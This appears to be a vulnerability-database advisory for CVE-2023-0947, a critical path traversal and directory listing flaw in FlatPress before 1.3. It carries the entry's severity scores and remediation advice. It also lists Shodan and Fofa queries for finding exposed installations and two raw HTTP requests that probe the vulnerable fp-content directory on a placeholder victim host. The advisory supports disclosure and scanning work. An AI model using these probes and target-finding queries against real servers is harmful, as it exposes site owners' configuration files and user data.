| Title | Flatpress < 1.3 - Path Traversal |
|---|---|
| Author | r3Y3r53 |
| Severity | Critical |
| Impact | Unauthenticated attackers can exploit path traversal to access and list sensitive directories and files in the FlatPress blogging system, potentially exposing configuration files and user data. |
| Remediation | Update FlatPress to version 1.3 or later that properly validates directory paths and prevents unauthorized directory listing in fp-content. |
| CVSS Score | 9.8 |
| EPSS Score | 0.79336 |
| CVE ID | CVE-2023-0947 |
| CWE ID | CWE-22 |
| Shodan Query | http.favicon.hash:-1189292869http.html:"flatpress" |
| Fofa Query | body="flatpress"icon_hash=-1189292869 |
| Tags | cve cve2023 huntr lfi flatpress listing vuln |
Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.
GET /fp-content/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; nl-nl) AppleWebKit/527+ (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /flatpress/fp-content/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0947.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-0947.pcap
N/AN/A